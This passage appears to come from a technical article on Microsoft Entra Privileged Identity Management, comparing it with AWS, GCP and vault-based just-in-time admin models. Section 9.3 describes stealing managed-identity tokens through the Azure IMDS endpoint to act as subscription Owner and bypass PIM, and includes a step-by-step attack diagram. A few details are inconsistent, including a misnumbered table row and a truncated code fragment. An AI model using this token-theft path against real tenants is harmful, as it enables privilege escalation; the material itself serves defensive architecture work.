on-premises-synced groups, can be PIM-enabled [@ms-learn-pim-for-groups].

The interesting design choice is that PIM-for-Groups gates two distinct surfaces per group: membership and ownership. The two surfaces each get their own activation policy [@ms-learn-pim-groups-role-settings].

The extension of PIM eligible/active assignment to Entra security groups and Microsoft 365 groups. Originally previewed in August 2020 as "Privileged Access Groups" (role-assignable security groups only) [@simons-2020-aug]; renamed to "PIM for Groups" in January 2023 [@ms-learn-pim-for-groups]; reached general availability in October 2023 with the broader scope (role-assignable security groups, non-role-assignable security groups, and M365 groups), with JIT for both membership and ownership [@ms-techcommunity-pim-groups-ca-ga-2023]. Excludes dynamic-membership groups and groups synchronized from on-premises environments [@ms-learn-pim-for-groups], [@ms-learn-pim-groups-role-settings]. A group owner can add members. A privileged access group whose membership is PIM-gated but whose ownership is permanent-active offers an unmediated elevation path: a compromised owner adds themselves as a member, bypassing the membership gate they would have had to activate. PIM-for-Groups gates both surfaces because gating membership without gating ownership is a one-bypass-step elevation. The two policies are independent; both must be set.

Boundary 3: Partner tenants -- GDAP and Azure Lighthouse

Until 2022, the Microsoft partner channel -- Cloud Solution Providers and Managed Service Providers -- worked through a model called Delegated Admin Privileges (DAP), in which the partner held standing Global Administrator on every customer tenant they touched. The Nobelium supply-chain attack tradition of 2020-2021 made the structural risk of that posture unignorable [@cisa-aa20-352a]: one compromise of one partner credential meant Global Administrator across hundreds or thousands of customer tenants simultaneously.

In May 2022, Microsoft introduced Granular Delegated Admin Privileges (GDAP) [@ms-learn-gdap], [@crayon-gdap]. GDAP replaces the standing-GA pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. Microsoft Learn's framing makes the design explicit: "GDAP is a security feature that provides partners with least-privileged access following the Zero Trust cybersecurity protocol. It lets partners configure granular and time-bound access to their customers' workloads in production and sandbox environments. Customers must explicitly grant the least-privileged access to their partners" [@ms-learn-gdap].

The May 2022 Microsoft Partner Center capability that replaces legacy DAP's standing-Global-Administrator-on-every-customer-tenant pattern with time-bound (one to seven-hundred-thirty days) and role-scoped delegation between partner and customer tenants. GDAP is the partner-tenant analogue of PIM eligible assignment [@ms-learn-gdap].

The Azure plane has a parallel construct. Azure Lighthouse eligible authorizations, introduced alongside GDAP, extend PIM-for-Azure-Resources eligibility across the tenant boundary [@ms-learn-lighthouse-eligible]. The customer (not the partner) controls the PIM policy on the delegated authorization. One important exception: service principals cannot use eligible authorizations, because there is currently no way for a service principal to elevate its access [@ms-learn-lighthouse-eligible]. The application-identity gap we reach in section 9 reaches into Lighthouse too.

Boundary 4: PIM and Conditional Access authentication context

The October 2023 GA wave closed the activation-gate-versus-sign-in-gate gap. Before October 2023, Conditional Access could gate sign-in into the tenant, but it could not gate the activation event itself. After October 2023, an authentication-context-tagged Conditional Access policy can target activation specifically [@ms-techcommunity-pim-groups-ca-ga-2023]. A policy of the form "activation of any control-plane role requires a compliant device and a fresh MFA challenge" becomes expressible without third-party tooling [@ms-learn-pim-change-default-settings].

The retirement of Tier-0, Tier-1, Tier-2

The umbrella framing has also shifted. Microsoft's 2014 Tier-0 / Tier-1 / Tier-2 model is being progressively retired in favour of the Enterprise Access Model (EAM), which uses control plane, management plane, and data/workload plane as the structural divisions [@ms-learn-eam]. EAM is cloud-native where Tier-0/1/2 was on-premises-centric. Microsoft Learn states the mapping: "Tier 0 expands to become the control plane and addresses all aspects of access control", and "what was tier 1 is now split into the following areas: Management plane ... Data/Workload plane" [@ms-learn-eam].

The post-2021 Microsoft reference architecture that replaces the Tier-0/Tier-1/Tier-2 administrative model with a plane-based division: control plane, management plane, and data/workload plane. EAM is cloud-native and zero-trust-friendly where Tier-0/1/2 was on-premises-centric [@ms-learn-eam]. Microsoft's RaMP -- the Rapid Modernization Plan -- is the post-2018 deployment roadmap that operationalizes EAM [@ms-docs-github-ramp].

The retirement is partial. The practitioner audience still uses Tier-0/1/2 more often than EAM in day-to-day language. The Microsoft Learn page for Securing Privileged Access explicitly cross-references both [@ms-learn-spa-overview].

Coverage is one half of the story. The other half is detection. What does PIM do when someone in the Privileged Role Administrator role simply assigns Global Administrator to a user directly through Microsoft Graph, bypassing the activation workflow entirely?

7. The Detection Layer: Six PIM Alerts and the Assignment-Bypass Class

PIM gates activation. The first question every adversary thinks of, and every architect should think of next, is: what about the assignment itself? What happens when someone in the Privileged Role Administrator role just creates a permanent-active Global Administrator assignment directly, skipping the eligible-to-active workflow entirely?

The answer is the article's second aha moment, and it is deliberately surprising.

The six PIM Alerts

Microsoft Learn documents seven named alerts in the PIM Alerts surface for Microsoft Entra roles [@ms-learn-pim-alerts]. Six of them are behavioural detections; the seventh is a licensing-precondition alert that fires when the tenant lacks the appropriate license.The seventh alert, named "The organization doesn't have Microsoft Entra ID P2 or Microsoft Entra ID Governance," is a low-severity licensing-precondition alert. The "six PIM Alerts" framing in this article refers to the six behavioural alerts; the licensing alert is structurally distinct. The six behavioural alerts, with the canonical names verbatim from the documentation, are:

#	Alert (verbatim)	Severity	What it detects	Configurable threshold
1	There are too many Global Administrators	Low	Tenant exceeds a tunable count and percentage of standing GAs	Minimum count 2-100 and percentage 0-100%
2	Roles are being assigned outside of Privileged Identity Management	High	A privileged role assignment was created via Microsoft Graph or the classic admin centre without going through PIM	None (binary)
3	Roles are being activated too frequently	Low	Post-hoc activation-frequency anomaly	Activation count and time window
4	Administrators aren't using their privileged roles	Low	Staleness on activation; eligible assignment unused	0-100 day threshold
5	Roles don't require multifactor authentication for activation	Low	Configuration drift on the per-role activation policy	None (binary on role policy)
6	Potential stale accounts in a privileged role	Medium	Sign-in staleness on a privileged principal	1-365 day threshold

The third row -- "Roles are being assigned outside of Privileged Identity Management" -- is the load-bearing one. Microsoft Learn rates it High severity because it is the alert that fires when somebody routed around PIM entirely [@ms-learn-pim-alerts]. The verbatim documentation reads: "Privileged role assignments made outside of Privileged Identity Management aren't properly monitored and might indicate an active attack" [@ms-learn-pim-alerts].

The High-severity PIM Alert "Roles are being assigned outside of Privileged Identity Management." It fires when a privileged role is assigned via a path other than PIM -- typically via Microsoft Graph, the classic admin centre assignment surface, or PowerShell. The alert is detective. It fires after the assignment is created [@ms-learn-pim-alerts].

Detective, not preventive -- and why

Read the definition again. The alert fires after the assignment is created. PIM does not block direct assignments outside its workflow.

For most architects this lands hard. The reasonable next thought is "if PIM does not block the bypass, what is the point?" Sit with that thought, then read the design rationale.

The Microsoft Graph endpoints that allow direct role assignment are the integration surface every legitimate administrative tool uses. Identity Governance products use them. CI/CD identity provisioning scripts use them. Break-glass automations use them. Microsoft's own admin centres use them in some configurations. The customer-side tools that scan, audit, remediate, and provision against the tenant use them. A preventive block on direct assignment would break every one of those integrations. It would also break PIM itself; the eligible-to-active materialization step is a write to the same assignment surface.

Note: PIM does not block direct role assignments outside its workflow because blocking would break the Microsoft Graph integration surface every legitimate administrative tool uses. The High-severity assignment-bypass alert is detective: it fires after the assignment is created. Customers who need preventive blocking layer a separate Conditional Access policy on the Graph endpoint, an Azure Policy at the management-group scope, or an entitlement-management workflow on top of PIM.

This is Aha #2. The reader who walked in expecting PIM to be a "deny direct assignments" product walks out understanding why the design says "alert loudly via High severity, then let the customer layer preventive controls based on their tooling estate." The trade-off is named, not hidden.

The 1000-notification ceiling and the SIEM-side correlation

One operational footnote and one wider observation. The notification fan-out has a hard cap: "The maximum number of notifications sent per one event is 1000. If the number of recipients exceeds 1000, only the first 1000 recipients will receive an email notification" [@ms-learn-pim-alerts]. Very large tenants whose privileged groups exceed the cap should not rely on email-notification fan-out alone.The detection layer beyond PIM Alerts is Microsoft Sentinel UEBA, which builds dynamic behavioural profiles for users, hosts, IP addresses, applications, and other entities and emits anomaly scores against AuditLogs operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. Sentinel UEBA is the closest 2026 Microsoft-shipped activation-anomaly-scoring surface; it is detective SIEM correlation, not synchronous gating.

The wider observation is that the PIM detection layer is one piece of a larger pipeline. PIM Alerts give you the High-severity assignment-bypass detection. Microsoft Sentinel UEBA gives you per-user behavioural-anomaly scoring against the audit-log events [@ms-learn-sentinel-ueba]. Entra ID Protection gives you sign-in-risk and user-risk classifications for the principal whose token was used. The mature 2026 deployment correlates all three; the assignment-bypass alert is the floor of that pipeline, not the ceiling.

Microsoft solved the JIT-admin problem with a two-state assignment object, four extension surfaces, and a six-alert detection layer. Did the rest of the industry agree? Look at what AWS and Google bet on, and at the third-party vault market that predates both.

8. Competing Architectures: AWS Sessions, GCP Bindings, and the Vault Model

Microsoft bet on a two-state assignment object. The rest of the industry placed different bets.

AWS bet on the session credential. Google bet on the conditional binding. The third-party PAM market bet on the vault. HashiCorp bet on the ephemeral credential. Each architecture is a different answer to one question: what should be the bounded unit of privilege? PIM bounds the assignment state; AWS bounds the session; GCP bounds the binding; CyberArk and Vault bound the credential. The methods are architecturally distinct, and they coexist in real estates more often than they compete.

AWS: bound the session

AWS IAM Identity Center plus the Security Token Service AssumeRole API bound the session, not the assignment. Permanent role-bindings -- permission sets attached to identities -- are themselves standing. The temporary part is the session that materializes when the identity calls AssumeRole. AWS documents this directly: "Temporary security credentials are short-term, as the name implies. They can be configured to last for anywhere from a few minutes to several hours. After the credentials expire, AWS no longer recognizes them or allows any kind of access from API requests made with them" [@aws-temp-creds].

The session lifecycle is concrete. AssumeRole returns an access key, a secret key, and a session token, with a minimum fifteen-minute and a maximum twelve-hour session duration; the API operation default is one hour [@aws-roles-use]. IAM Identity Center permission sets ship with a one-hour default and a one-to-twelve-hour configurable range [@aws-sessionduration].

The AWS Security Token Service API by which a principal materializes a time-bounded session credential -- access key, secret key, session token -- from a permanent role-binding. The session is the ephemeral artifact; the binding is permanent [@aws-temp-creds], [@aws-roles-use].

The AWS approach has clear strengths in multi-account AWS Organizations and in programmatic access. It is also the natural fit for any workload that needs short-lived credentials. The gaps relative to PIM: no built-in approval workflow, no equivalent of the PIM Alerts surface, and no eligible-versus-active distinction on the role-binding itself. A standing AssumeRole grant is, structurally, standing privilege; what is bounded is the session that consumes it.

Google Cloud: bound the binding

Google Cloud IAM took a different route. IAM Conditional Bindings let an allow policy include a Common Expression Language predicate that is evaluated at request time. The canonical temporal pattern is request.time < timestamp(...), which expires the binding at a wall-clock instant [@gcp-conditions]. There is a practical ceiling of one hundred conditional bindings per allow policy.

On top of conditional bindings, Google launched Privileged Access Manager (PAM) in public preview in May 2024 [@gcp-iam-release-notes], [@gcp-pam]. PAM adds the entitlement-and-grant workflow that PIM ships natively: eligible principals, eligible roles, max duration, justification, approvers, and notifications, with grant duration enforced by the underlying conditional binding revocation. Audit-event correlation is documented in a separate page [@gcp-pam-audit].

A Google Cloud IAM role binding that includes a Common Expression Language predicate evaluated at request time. The most common temporal pattern, `request.time < timestamp(...)`, expires the binding at a wall-clock instant; Google Cloud Privileged Access Manager layers an entitlement-and-grant workflow on top [@gcp-conditions], [@gcp-pam].

The GCP approach is the closest hyperscaler analogue to PIM's eligible/active model in architecture, but the PAM productization shipped in preview in May 2024 [@gcp-iam-release-notes] -- nearly a decade after Azure AD PIM's 2016 GA -- and the alert and detection surfaces are correspondingly less mature.

The third-party vault: CyberArk, BeyondTrust, Delinea

The longest-standing answer is the one the third-party PAM market built. CyberArk, BeyondTrust, and Delinea -- all three 2024 Gartner Magic Quadrant Leaders for Privileged Access Management [@cyberark-press-2024], [@beyondtrust-press-2024], [@delinea-press-2024] -- bound the credential, not the assignment or the session. The credential exists permanently in the vault; access to the credential is bounded by session brokering, periodic password rotation, and full session recording.

The vault model has structural strengths PIM's role-assignment-state model cannot match. The vault covers heterogeneous estates that include Windows, Linux, network devices, databases, mainframes, and OT/SCADA appliances -- every system whose credentials cannot be re-architected to a cloud-IAM eligible-active object. Vault-and-broker products provide session recording for SOX and PCI-DSS evidence collection, and they integrate with credential-rotation workflows for legacy vendor appliances whose hard-coded credentials cannot be eliminated.

Most large enterprises run both Entra PIM (for Entra and Azure role assignments) and a third-party PAM product (for SSH, on-premises service accounts, database passwords, network devices). The two markets are complements more than substitutes.

HashiCorp Vault and OpenBao: bound the credential's lifetime

HashiCorp Vault took the credential-bounded idea and made it ephemeral through dynamic secrets: a credential materialized on demand by Vault for a configured backend (a database, a cloud IAM, a PKI), returned with a lease and TTL, and revoked at the backend when the lease expires [@vault-databases]. The OpenBao fork, governed under the Linux Foundation, preserves the same dynamic-credential semantics [@openbao].OpenBao was created in late 2023 after HashiCorp moved Vault from the open-source MPL to the Business Source License. The Linux Foundation announced on April 30, 2024 that OpenBao would join LF Edge as one of four new projects (alongside EdgeLake, InfiniEdgeAI, and InstantX) at the Open Networking and Edge (ONE) Summit [@lfedge-openbao-2024]. The dynamic-secret primitive -- "create a credential, hand it out, revoke it at lease expiry" -- is preserved on both code lines.

A credential materialized by Vault on demand for a configured backend -- database, cloud IAM, or PKI -- returned with a lease ID and TTL; at lease expiry Vault revokes the credential at the backend. The canonical 2026 open-source primitive for replacing hard-coded application credentials [@vault-databases].

The Vault story matters for our purposes because it is the strongest 2026 coverage of the application-identity surface -- dynamic database credentials, Kubernetes service-account tokens, cloud-IAM short-lived credentials. PIM does not cover that surface today; Vault does. This previews the open boundary in section 9.

What is bound, in one comparison table

Method	What is bound	Mechanism	Default duration	Approval workflow	Detection layer	Partner tenant	Application identities	License
Entra PIM	Assignment state	eligible -> active transition with policy gates	1h (Global Admin)	Built-in approver routing	Six behavioural PIM Alerts plus Sentinel UEBA	GDAP + Lighthouse	Not yet (open boundary)	Entra ID P2 or Entra ID Governance
AWS IAM Identity Center + STS	Session credential	AssumeRole returns access/secret/session token	1h	Not built-in	Not equivalent to PIM Alerts	Not directly comparable	Strong (short-lived creds native)	Included in AWS
GCP IAM + PAM	Policy binding	CEL predicate plus entitlement-and-grant	Per entitlement	Built-in via PAM	Audit events plus Cloud Audit Logs	Cross-org via folders	Service-account impersonation	Included in GCP
CyberArk/BeyondTrust/Delinea	Credential knowledge	Vault stores, broker hands out, rotates	Per session policy	Built-in approver routing	Session recording, full SIEM integration	Per-tenant deployment	Coverage via shared accounts	Per-seat commercial
HashiCorp Vault / OpenBao	Credential lifetime	Lease-based revocation, dynamic secrets	Per backend, per lease	Optional plugins	Audit log; lease events	N/A	Strong (dynamic secrets)	Open source / commercial

The five methods occupy four positions on the "what is bound" axis: assignment-state (PIM), session-credential (AWS), policy-binding (GCP), and knowledge-of-credential (CyberArk and Vault). The methods are architecturally distinct, and the right enterprise answer in heterogeneous estates is some composition of more than one.

PIM is the most mature JIT-admin product in the cloud, and it has the most complete coverage of the user-principal surface. The remaining gaps are not about catching up to the competitors; they are about a class of identity the eligible/active model was never designed to gate.

9. What the JIT-Admin Pattern Does NOT Close

For all the architectural elegance of the two-state assignment object, PIM does not close the JIT-admin problem. It closes a sub-problem, very well, and leaves five structural limits an honest treatment must name.

9.1 Standing eligibility is itself standing privilege

PIM bounds the active duration. It does not bound the eligibility duration. A user with a permanent-eligible Global Administrator assignment is one activate() call away from the role's permissions for the next hour. If that user has been phished -- credential plus MFA bypass via a session-cookie capture, say -- the attacker can satisfy the gates. The MFA challenge passes. The justification text is whatever the attacker types. The approval, if required, routes to the legitimate approver, who may approve a legitimate-looking request that actually came from the attacker.

PIM produces an audit-log record of every step. It does not produce a structural impossibility. Eligibility is itself a security-critical property of the identity, and standing eligibility is the modern analogue of standing membership: a long-lived relationship between principal and role that a successful credential compromise can exercise.

9.2 Approver collusion

The approval gate is two-phishee resistant only when the requester and approver are independently compromisable. Two-phishee collusion -- the requester and the approver are the same adversary, or two adversaries cooperating -- defeats the workflow at the mechanism layer. The usual mitigations raise the bar: named approvers rather than approver groups (which can be compromised at the group level), CA-gated approval actions, and four-eyes alternatives. None close the class.

9.3 The application-identity gap

This is the article's heaviest limit, and it deserves the most space.

PIM's eligible-active state machine is currently defined over principal in (user | group). Service principals, managed identities, and OAuth consent grants do not flow through PIM activation. Their role assignments are permanent and active by default, and there is no eligible category that applies to them. Microsoft Learn's documentation for Workload ID Premium and Conditional Access for workload identities makes this explicit: ID Protection workload-identity risk detections cover service principals in single-tenant, non-Microsoft SaaS, and multitenant apps, but "Managed Identities aren't currently in scope" [@ms-learn-workload-identity-risk]. Conditional Access for workload identities applies similarly only to service principals owned by the organization, and CA policies "assigned to a group that contains a service principal are not enforced for that service principal" [@ms-learn-ca-workload-identity].

Andy Robbins's three-part Managed Identity Attack Paths series, published June 6-8, 2022 on the SpecterOps blog, is the canonical demonstration of how this gap is exploited [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]. The mechanism is direct. An Azure compute resource -- an Automation Account [@robbins-mip-part1], a Logic App [@robbins-mip-part2], or a Function App [@robbins-mip-part3] -- carries an attached managed identity. The managed identity holds standing role assignments at whatever scope the operator granted, often Owner or Contributor on a subscription.

From inside the resource, any code can fetch an OAuth access token for the managed identity by calling the Azure Instance Metadata Service endpoint at http://169.254.169.254/metadata/identity/oauth2/token. No human in the loop. No MFA challenge. No PIM activation. The audit log records a service-principal token issuance, not an alice-clicked-Activate event.

Managed Identity assignments are an extremely effective security control... But Managed Identities introduce a new problem: they can quickly create identity-based attack paths in Azure that may lead to escalation of privilege opportunities. -- Andy Robbins, *Managed Identity Attack Paths, Part 1: Automation Accounts*, June 6, 2022 [@robbins-mip-part1] An Azure-managed service principal whose credentials are issued and rotated by Azure itself. The underlying Azure resource (a VM, App Service, Function App, Logic App, AKS cluster) retrieves the OAuth access token via the Instance Metadata Service endpoint. Managed identities are not currently in scope for PIM activation; their role assignments are permanent and active [@ms-learn-managed-identities-overview]. The Azure Instance Metadata Service endpoint at `http://169.254.169.254/metadata/identity/oauth2/token`, a link-local non-routable address reachable only from inside the Azure resource itself, that returns an OAuth 2.0 access token for the attached managed identity. The address is the credential: any process running on the resource can fetch the token without storing or presenting any secret. sequenceDiagram autonumber participant Attacker participant FunctionApp as Compromised Function App participant IMDS as IMDS endpoint 169.254.169.254 participant ARM as Azure Resource Manager participant PIMUnused as PIM activation (unused) Attacker->>FunctionApp: Code execution via supply-chain or vuln FunctionApp->>IMDS: GET /metadata/identity/oauth2/token IMDS-->>FunctionApp: OAuth access token for managed identity FunctionApp->>ARM: Action as Owner on subscription ARM-->>FunctionApp: Action succeeds Note over PIMUnused,Attacker: No human, no MFA, no activation, no PIM audit

MITRE ATT&CK maps the class explicitly. T1078.004 -- Valid Accounts: Cloud Accounts cites Robbins's Part 1 as primary reference for the managed-identity case [@mitre-t1078-004]. The page reads: "In Azure environments, adversaries may target Azure Managed Identities, which allow associated Azure resources to request access tokens. By compromising a resource with an attached Managed Identity, such as an Azure VM, adversaries may be able to Steal Application Access Tokens to move laterally across the cloud environment" [@mitre-t1078-004].

T1548.005 -- Temporary Elevated Cloud Access explicitly names PIM as an instance of the JIT-access pattern adversaries abuse: "Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles... Just-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner" [@mitre-t1548-005].

T1548.005 (Temporary Elevated Cloud Access) lists Microsoft's *Approve just-in-time access requests* documentation as citation [1] of the technique, recognizing PIM as a canonical implementation of the JIT-access pattern adversaries abuse [@mitre-t1548-005]. Being named in the ATT&CK framework is, in the security domain, the most explicit acknowledgement an adversary model can give a defensive product.

Note: Three anchors to walk away with: Andy Robbins's June 2022 Managed Identity Attack Paths series [@robbins-mip-part1], [@robbins-mip-part2], [@robbins-mip-part3]; MITRE ATT&CK T1078.004 citing Robbins as primary [@mitre-t1078-004]; the IMDS endpoint at 169.254.169.254 as the technical mechanism [@ms-learn-managed-identities-overview]. If your tenant has any managed identity with Owner or User Access Administrator at a subscription scope, you have an unmediated bypass path around PIM until that role assignment is tightened.

9.4 The assignment-bypass is detective, not preventive

The High-severity assignment-bypass alert documented in §7 is detective by design (see Aha #2). The structural limit it leaves open is that preventive blocking is not the PIM product's default: customers who want it layer a Conditional Access policy on the Microsoft Graph endpoint or an Azure Policy at the management-group scope [@ms-learn-azure-policy], accepting that some legitimate Graph integration may need an exception.

9.5 Customer-owned PIM policy in CSP and Lighthouse scenarios

In the partner-managed case, the customer (not the partner) controls the PIM policy on a delegated authorization [@ms-learn-lighthouse-eligible]. This is the right place to put control, but it is also the place misconfiguration is most common. A customer whose Lighthouse eligible authorization is set with permissive activation policies (no MFA, no approval, large maximum duration) has an unmediated partner activation surface, and the partner cannot tighten the customer-side policy. The MSP-managed case is the operational gotcha most frequently raised at PIM-deployment review boards.

Aha #3: The gap is a data-model problem, not a patchable defect

This is the third aha moment, and it lands differently from the first two.

Key idea: The application-identity gap is not a backlog item. Extending the eligible-active state machine from principal in (user | group) to principal in (user | group | service principal | managed identity | OAuth consent grant) is a data-model extension that would require changes to the role-assignment object schema, the Microsoft Graph role-management endpoints, the PIM evaluation pipeline, the audit-log schema, the Sentinel detection schema, and every downstream IGA tool. The 2024+ Microsoft responses extend some controls to application identities. They do not yet introduce an eligible/active assignment-category type for application principals.

Microsoft has shipped partial responses. Entra Workload ID Premium [@ms-entra-workload-id-product] is a separate three-dollar-per-workload-identity-per-month SKU [@ms-entra-workload-id-product] that unlocks Conditional Access for workload identities [@ms-learn-ca-workload-identity] (with the explicit managed-identity exclusion clause) and ID Protection workload-identity risk detections [@ms-learn-workload-identity-risk]. The PIM page on access reviews documents that "Using Access Reviews for Service Principals requires a Microsoft Entra Workload ID Premium plan in addition to a Microsoft Entra ID P2 or Microsoft Entra ID Governance license" [@ms-learn-pim-access-reviews]. Microsoft's flagship Ignite 2025 announcement was Microsoft Entra Agent ID for AI agents [@ms-entra-ignite-2025]; the announcement is identity for AI workloads, not an eligible-active type extension for service-principal role assignments.

Robbins's class is closed-form within the 2026 PIM architecture. Closing it requires a new architecture, not a patch.

None of these limits is a defect. Each is a deliberate design boundary, and naming them is the academic honesty the topic deserves. The interesting question: where is active research happening, and what would closing the gap actually look like?

10. Open Problems: Where Active Research Is Happening

The five limits in section 9 are settled architectural boundaries. The open problems are different. Each is something nobody has shipped a complete solution to as of 2026, but each has named partial results and named anchors.

10.1 JIT-gating application identities

The data-model extension previewed in section 9's Aha #3 is the largest open problem in this space, and the one Microsoft is responding to most publicly.

What has been tried. Entra Workload ID Premium at three dollars per workload identity per month [@ms-entra-workload-id-product]. Conditional Access for workload identities, which lets the tenant block service-principal sign-ins based on IP range, ID-Protection risk score, or authentication context [@ms-learn-ca-workload-identity]. ID Protection workload-identity risk detections that flag suspicious sign-ins, leaked credentials, and admin-confirmed compromise for service principals [@ms-learn-workload-identity-risk]. Service-principal access reviews, gated behind Workload ID Premium plus Entra ID P2 or Governance [@ms-learn-pim-access-reviews]. Microsoft Entra Agent ID, the flagship Ignite 2025 announcement, brings first-class identity to AI agents [@ms-entra-ignite-2025] -- parallel to, but not the same as, an eligible-active type extension on application role assignments.

An identity used by a software workload to authenticate to other services. In Microsoft Entra ID the term encompasses application objects, service principals, and managed identities [@ms-learn-workload-identities-overview]. As of 2026, workload identities are not in scope of the eligible/active assignment-category model. The 2024+ Workload ID Premium SKU extends sign-in-time controls and risk detection to service principals, but does not yet introduce an eligible category for service-principal role assignments.

What is the conjecture? Closing this gap requires extending the role-assignment object's principal axis to include service principals, managed identities, and OAuth consent grants as first-class subjects of the eligible-active state machine. That extension would require a defined activate() semantics for non-human principals -- itself the hard problem, because the canonical user activation flow assumes an interactive MFA challenge.

Microsoft Learn states the difficulty bluntly: workload identities "can't perform multifactor authentication. Often have no formal lifecycle process. Need to store their credentials or secrets somewhere" [@ms-learn-workload-identities-overview]. The non-interactive case requires either programmatic policy gates (request from this caller, from this IP range, against this entitlement) or a delegation model where a human approver supplies the gate-passing event on the workload's behalf.

10.2 Real-time activation-anomaly blocking

The PIM Alert "Roles are being activated too frequently" is post-hoc. It fires after the activation has already occurred and after the count crosses a threshold. The phished-but-still-authentic activation -- the attacker who supplies a valid MFA, a plausible justification, and a real ticket number -- is observationally indistinguishable from a legitimate emergency activation at the mechanism layer. The only signal that distinguishes them must come from behavioural telemetry.

What has been tried. Microsoft Defender for Cloud Apps ships an out-of-the-box user-and-entity behavioural analytics (UEBA) and machine-learning anomaly-detection layer; the documented policy weighs more than thirty risk indicators across eight risk-factor groups (risky IP, login failures, admin activity, inactive accounts, location, impossible travel, device and user agent, activity rate), with a seven-day initial learning period and a June 2025 transition to a dynamic threat-detection model [@ms-learn-dfca-anomaly]. Microsoft Sentinel UEBA scores anomalies post-event against AuditLogs operations including role-eligibility additions and activations [@ms-learn-sentinel-ueba]. Microsoft Defender for Identity correlates on-premises and cloud sign-in patterns for behavioural-anomaly detection. Neither Sentinel UEBA nor Defender for Cloud Apps is a synchronous gate. Both are detective layers that fire after the activation event has already created consequences.

The academic upper bound for what character-level and LSTM detectors achieve on adjacent tasks comes from Hendler, Kels, and Rubin's 2019 work on AMSI-based detection of malicious PowerShell code, which reports a true-positive rate of nearly 90% at a false-positive rate of less than 0.1% on the PowerShell-misuse classification problem [@arxiv-hendler-1905]. That is the ceiling a probabilistic activation-anomaly classifier could approach. It is not enough to gate synchronously without false-positive operational pain, which is why the deployed surface is post-hoc UEBA scoring rather than pre-commit blocking.

The conjecture. Synchronous gating on behavioural signal at activation time would require Conditional Access (or its successor) to subscribe to an activation-event hook and consume a risk score from ID Protection, Defender for Cloud Apps, or Sentinel UEBA in the few hundred milliseconds before PIM materializes the active assignment. The architectural primitives exist; the synchronous risk-evaluation hook does not yet ship.

10.3 Hybrid-bridge JIT

A single approval workflow spanning the on-premises (MIM PAM / shadow principals) and cloud (Entra PIM) boundaries is not a shipping product. Microsoft has Entra Cloud Sync and Entra Connect for directory synchronization; neither bridges the activation workflow. MIM 2016 is on extended support through January 9, 2029 [@ms-learn-mim-2016]; Microsoft Learn states the path forward is cloud-first PIM with on-prem AD progressively scoped down to the few resources that cannot move [@ms-learn-mim-pam-overview].

MIM 2016 PAM is in extended support, not active development, and Microsoft Learn explicitly states it is "not recommended for new deployments in Internet-connected environments" [@ms-learn-mim-pam-overview]. SP3 ships compatibility updates for SharePoint SE, Exchange SE, and SQL Server 2022 [@ms-learn-mim-2016], but the product line is in maintenance posture. The on-premises half of a hybrid-bridge JIT story requires a different architectural choice than re-investing in MIM.

10.4 Coverage-as-code

How do you evaluate PIM policy coverage in CI/CD for a tenant with two hundred custom Azure roles and fifty directory roles, and gate every PR that touches the role-management policies?

Best partial results. Microsoft Cloud Security Benchmark v3 Privileged Access controls (PA-1, PA-2, ...) give Boolean per-recommendation pass/fail evaluation [@ms-learn-mcsb-v3-pa] -- close, but per-recommendation Boolean rather than composable policy. The PowerShell cmdlets Get-MgPolicyRoleManagementPolicy and Get-MgPolicyRoleManagementPolicyAssignment read role-management policies via Microsoft Graph; the cmdlets ship in the Microsoft.Graph.Identity.SignIns module, despite the Identity Governance branding [@ms-learn-graph-pim-policy-cmdlet].The PIM role-management-policy cmdlets are commonly mis-attributed to the Microsoft.Graph.Identity.Governance PowerShell module because of the Identity Governance branding. They are actually in Microsoft.Graph.Identity.SignIns. The Import-Module line that gets the cmdlets into scope is Import-Module Microsoft.Graph.Identity.SignIns [@ms-learn-graph-pim-policy-cmdlet]. The EntraOps Privileged EAM community project on GitHub, maintained by Thomas Naunheim, demonstrates the "track changes and history of privileged principals and their assignments as code" idiom against the Enterprise Access Model classification [@entraops-github]. Azure Policy itself operates on Azure resource configurations and does not directly evaluate PIM role-management policy state [@ms-learn-azure-policy], which is the data-model gap that drives the GitOps-flavoured drift-detection community pattern.

{` // Take an array of role-management policy assignments // (the kind Get-MgPolicyRoleManagementPolicyAssignment returns) // and assert tenant-wide PIM coverage invariants.

The conjecture. A full coverage-as-code primitive needs Azure Policy (or its successor) to evaluate PIM role-management policy state with the same first-class semantics it applies to Azure resource configuration. That extension would let a tenant declare an invariant -- "every role in the control plane has requires_mfa=true and max_duration_hours <= 1" -- and have the platform enforce it continuously across drift, the way Azure Policy already enforces resource invariants.

10.5 Adaptive-cadence eligibility reviews

Should eligible membership be access-reviewed at higher cadence than active assignments? Eligible membership is standing privilege; active membership is bounded. The argument for adaptive cadence -- reviewing eligibility more frequently when behavioural signals or organizational events suggest the principal may no longer need the role -- is intuitive but mechanically unshipped.

Best partial result. The 2024+ ML-based access-review recommendations [@ms-learn-review-recommendations] -- inactive-user 30-day Deny, user-to-group-affiliation Deny -- are within-cycle reviewer-assist features. They help reviewers decide during a configured access review. They are not cross-cycle adaptive-cadence triggers that fire a new review off-schedule when conditions warrant.

These are research problems. The practitioner does not have the luxury of waiting for them to be solved. What does Monday morning look like for the architect who has read this far and now has to deploy?

11. Practical Guide: Monday Morning for the 2026 Tenant Architect

You have read ten thousand words. You are responsible for a Microsoft 365 tenant that audits against SOX, SOC 2, and ISO 27001. You have a budget for Entra ID P2 (or Entra ID Governance) per privileged user. What do you do on Monday?

Work in this order. The list is ordered by cost-to-impact, with the cheapest, highest-impact items first.

Step 1: Baseline the Tier-0 surface

Every directory role at "Privileged" classification or above should be PIM-eligible-only. The exceptions are the two emergency-access permanent-active Global Administrator accounts (break-glass), which we return to in Step 4.

Activation requires MFA, approval, justification, and ticket number for control-plane and management-plane roles. Maximum activation duration is one hour for Global Administrator and Privileged Role Administrator, and four hours for less-privileged roles. Configure per role per scope; remember that PIM-for-Azure-Resources policies do not inherit.

Import-Module Microsoft.Graph.Identity.Governance
Connect-MgGraph -Scopes 'RoleManagement.Read.Directory','User.Read.All'
$gaRoleId = (Get-MgRoleManagementDirectoryRoleDefinition `
    -Filter "displayName eq 'Global Administrator'").Id
Get-MgRoleManagementDirectoryRoleAssignment `
    -Filter "roleDefinitionId eq '$gaRoleId'" `
    -ExpandProperty Principal |
    Select-Object @{n='User';e={$_.Principal.AdditionalProperties.userPrincipalName}}, RoleDefinitionId

